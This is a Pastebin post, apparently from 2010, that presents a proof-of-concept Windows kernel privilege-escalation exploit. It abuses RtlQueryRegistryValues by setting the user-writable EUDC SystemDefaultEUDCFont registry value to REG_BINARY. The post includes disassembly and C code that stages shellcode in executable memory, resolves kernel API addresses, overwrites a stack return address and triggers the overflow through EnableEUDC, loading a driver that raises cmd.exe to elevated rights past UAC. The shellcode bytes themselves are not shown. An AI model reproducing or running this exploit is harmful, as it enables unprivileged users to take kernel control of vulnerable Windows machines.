Advertisement
Guest User

Untitled

a guest
Nov 24th, 2010
1,119
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.68 KB | None | 0 0
  1. Introduction
  2. I would like to present an exploit of an ambiguous parameter in Windows kernel API that leads to buffer overflows under nearly every version of Microsoft Windows, especially one that can be used as a backdoor to Windows user privilege system as well as User Access Control.
  3. The starring API would be RtlQueryRegistryValues, it meant to be used to query multiple registry values by a query table, given the EntryContext field as output buffer. There is a problem that this field can be either treated as a UNICODE_STRING structure or a ULONG buffer length followed by the actual buffer, and this is determined by the type of the registry key being queried.
  4. Using the code
  5. In this example, I found a registry key which can be manipulated with only user rights, by changing its type to REG_BINARY overflows the kernel. When Win32k.sys->NtGdiEnableEudc queries HKCU\EUDC\[Language]\SystemDefaultEUDCFont registry value, it assumes that the registry value is REG_SZ, so the buffer provided on stack is a UNICODE_STRING structure, of which the first ULONG value in this structure represents the length of the string buffer, but if the value in registry is REG_BINARY type, it will be wrongly interpreted as the length of the given buffer, thus overwrites the stack.
  6. Collapse
  7. .text:BF81BA91 push esi ; Environment
  8. .text:BF81BA92 push esi ; Context
  9. .text:BF81BA93 push offset ?SharedQueryTable@@3PAU_RTL_QUERY_REGISTRY_TABLE@@A ; QueryTable
  10. .text:BF81BA98 push edi ; Path
  11. .text:BF81BA99 lea eax, [ebp+DestinationString]
  12. .text:BF81BA9C push esi ; RelativeTo
  13. .text:BF81BA9D mov ?SharedQueryTable@@3PAU_RTL_QUERY_REGISTRY_TABLE@@A.QueryRoutine, esi ; _RTL_QUERY_REGISTRY_TABLE * SharedQueryTable
  14. .text:BF81BAA3 mov ?SharedQueryTable@@3PAU_RTL_QUERY_REGISTRY_TABLE@@A.Flags, 24h
  15. .text:BF81BAAD mov ?SharedQueryTable@@3PAU_RTL_QUERY_REGISTRY_TABLE@@A.Name, offset aSystemdefaulte ; "SystemDefaultEUDCFont"
  16. .text:BF81BAB7 mov ?SharedQueryTable@@3PAU_RTL_QUERY_REGISTRY_TABLE@@A.EntryContext, eax
  17. .text:BF81BABC mov ?SharedQueryTable@@3PAU_RTL_QUERY_REGISTRY_TABLE@@A.DefaultType, esi
  18. .text:BF81BAC2 mov ?SharedQueryTable@@3PAU_RTL_QUERY_REGISTRY_TABLE@@A.DefaultData, esi
  19. .text:BF81BAC8 mov ?SharedQueryTable@@3PAU_RTL_QUERY_REGISTRY_TABLE@@A.DefaultLength, esi
  20. .text:BF81BACE mov dword_BFA198FC, esi
  21. .text:BF81BAD4 mov dword_BFA19900, esi
  22. .text:BF81BADA mov dword_BFA19904, esi
  23. .text:BF81BAE0 call ds:__imp__RtlQueryRegistryValues@20 ; RtlQueryRegistryValues(x,x,x,x,x)
  24. .text:BF81BAE6 mov [ebp+var_8], eax
  25.  
  26. Stack trace shows the calling process is as follows:
  27. GDI32.EnableEUDC ->
  28. NtGdiEnableEudc ->
  29. GreEnableEUDC ->
  30. sub_BF81B3B4 ->
  31. sub_BF81BA0B ->
  32. RtlQueryRegistryValues (Overflow occurs)
  33. Given this we can design the registry value which will precisely overwrite the return address of the calling function on stack, results in an arbitrary buffer being executed in kernel mode. In my PoC the buffer contains a simple kernel PE loader, which will eventually load a driver that will escalate "cmd.exe” process privilege regardless of UAC.
  34. Collapse
  35. // Allocate buffer for the driver
  36. LPVOID pDrvMem = VirtualAlloc(NULL, sizeof(DrvBuf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  37. memcpy(pDrvMem, DrvBuf, sizeof(DrvBuf));
  38.  
  39. BYTE* pMem; // shellcode
  40. DWORD ExpSize = 0;
  41.  
  42. BYTE RegBuf[0x40] = {0}; // reg binary buffer
  43.  
  44. pMem = (BYTE*)VirtualAlloc(NULL, sizeof(Data), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  45. memcpy(pMem, Data, sizeof(Data)); // Copy shellcode
  46.  
  47. *(DWORD*)(RegBuf + 0x1C) = (DWORD)pMem; // Point return value to our buffer
  48.  
  49. ExpSize = 0x28;
  50.  
  51.  
  52. The shellcode need some kernel APIs, we need to get their addresses from the running kernel.
  53. Collapse
  54. // Get the running kernel file name
  55. HMODULE hDll = GetModuleHandle(L"ntdll.dll");
  56. pfnZwQuerySystemInformation fnZwQuerySystemInformation = (pfnZwQuerySystemInformation)GetProcAddress(hDll,"ZwQuerySystemInformation");
  57. PSYSTEM_MODULE_INFORMATIONS pModInfo = NULL;
  58. ULONG AllocSize = 0;
  59. fnZwQuerySystemInformation(SystemModuleInformation, pModInfo, AllocSize, &AllocSize);
  60.  
  61. pModInfo = (PSYSTEM_MODULE_INFORMATIONS)malloc(AllocSize);
  62. fnZwQuerySystemInformation(SystemModuleInformation, pModInfo, AllocSize, &AllocSize);
  63. HMODULE hKernel = LoadLibraryExA(pModInfo->modinfo[0].ImageName + pModInfo->modinfo[0].ModuleNameOffset, NULL, DONT_RESOLVE_DLL_REFERENCES);
  64.  
  65. //Relocation to the running kernel base
  66. DWORD Delta = (DWORD)pModInfo->modinfo[0].Base - (DWORD)hKernel;
  67.  
  68. free(pModInfo);
  69.  
  70. // For Vista, there is a Pool address on the stack which is going to be passed to ExFreePool before the function returns,
  71. // so we need a valid pool address to avoid BSOD.
  72.  
  73. if(vi.dwBuildNumber < 7600)
  74. {
  75. FixDWORD(pMem, sizeof(Data), 0xAAAAAAAA, 0x2C);
  76.  
  77. HANDLE hDummy = CreateSemaphore(NULL, 10, 10, L"Local\\PoC");
  78. PSYSTEM_HANDLE_INFORMATION pHandleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(sizeof(SYSTEM_HANDLE_INFORMATION));
  79. AllocSize = sizeof(SYSTEM_HANDLE_INFORMATION);
  80. fnZwQuerySystemInformation(SystemHandleInformation, pHandleInfo, AllocSize, &AllocSize);
  81.  
  82. pHandleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(pHandleInfo, AllocSize);
  83. fnZwQuerySystemInformation(SystemHandleInformation, pHandleInfo, AllocSize, &AllocSize);
  84.  
  85. for(DWORD i = 0; i < pHandleInfo->NumberOfHandles; i++)
  86. {
  87. if((HANDLE)pHandleInfo->Handles[i].HandleValue == hDummy)
  88. {
  89. *(DWORD*)(RegBuf + 0x4) = (DWORD)(pHandleInfo->Handles[i].Object) - 0x18;
  90. break;
  91. }
  92. }
  93. free(pHandleInfo);
  94. }
  95. else
  96. {
  97. FixDWORD(pMem, sizeof(Data), 0xAAAAAAAA, 0x30);
  98. }
  99.  
  100. // Now fills the API addresses needed
  101. FixDWORD(pMem, sizeof(Data), 0x11111111, (DWORD)GetProcAddress(hKernel, "ExAllocatePoolWithTag") + Delta);
  102. FixDWORD(pMem, sizeof(Data), 0x22222222, (DWORD)GetProcAddress(hKernel, "RtlInitAnsiString") + Delta);
  103. FixDWORD(pMem, sizeof(Data), 0x33333333, (DWORD)GetProcAddress(hKernel, "RtlAnsiStringToUnicodeString") + Delta);
  104. FixDWORD(pMem, sizeof(Data), 0x44444444, (DWORD)GetProcAddress(hKernel, "MmGetSystemRoutineAddress") + Delta);
  105. FixDWORD(pMem, sizeof(Data), 0x55555555, (DWORD)GetProcAddress(hKernel, "RtlFreeUnicodeString") + Delta);
  106. FixDWORD(pMem, sizeof(Data), 0x66666666, (DWORD)GetProcAddress(hKernel, "memcpy") + Delta);
  107. FixDWORD(pMem, sizeof(Data), 0x77777777, (DWORD)GetProcAddress(hKernel, "memset") + Delta);
  108. FixDWORD(pMem, sizeof(Data), 0x88888888, (DWORD)GetProcAddress(hKernel, "KeDelayExecutionThread") + Delta);
  109. FreeLibrary(hKernel);
  110.  
  111. // Here we tell the shellcode(PE loader) where the driver buffer is.
  112. FixDWORD(pMem, sizeof(Data), 0x11223344, sizeof(DrvBuf));
  113. FixDWORD(pMem, sizeof(Data), 0x55667788, (DWORD)pDrvMem);
  114.  
  115.  
  116. Finally, we set the registry value and call GDI32.EnableEUDC to fire the exploit.
  117. Collapse
  118. UINT codepage = GetACP();
  119. TCHAR tmpstr[256];
  120. _stprintf_s(tmpstr, TEXT("EUDC\\%d"), codepage); // Get current code page
  121. HKEY hKey;
  122. RegCreateKeyEx(HKEY_CURRENT_USER, tmpstr, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE | DELETE, NULL, &hKey, NULL);
  123. RegDeleteValue(hKey, TEXT("SystemDefaultEUDCFont"));
  124.  
  125. RegSetValueEx(hKey, TEXT("SystemDefaultEUDCFont"), 0, REG_BINARY, RegBuf, ExpSize);
  126.  
  127. __try
  128. {
  129. EnableEUDC(TRUE);
  130. }
  131. __except(1)
  132. {
  133. }
  134. RegDeleteValue(hKey, TEXT("SystemDefaultEUDCFont"));
  135. RegCloseKey(hKey);
  136.  
  137. After running this PoC, just type "whoami" in command prompt to see the escalated user credentials.
  138. Points of Interest
  139. All actions this PoC performs require only user privilege, but result in arbitrary kernel mode code execution due to the ambiguous design of RtlQueryRegistryValues. This design flaw exists in most versions of Windows kernels, yet no patch or documentation is publicly available on this issue.
  140. Additional Information
  141. This PoC may not correctly fix the exploited kernel context and resume execution without BSOD, such as on kernels ealier than 6.1.6000 are not supported, current supported kernels are:
  142. Windows Vista/2008 6.1.6000 x32,
  143. Windows Vista/2008 6.1.6001 x32,
  144. Windows 7 6.2.7600 x32,
  145. Windows 7/2008 R2 6.2.7600 x64.
  146. Beyond this scope you may contact me for information on how to tune the code to work correctly on your kernel or how the shellcode works, etc. Those contents are beyond the scope of this article and of no importance to the exploit, therefore it is not included.
  147. Contact
  148. Me: nooby@safengine.com
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement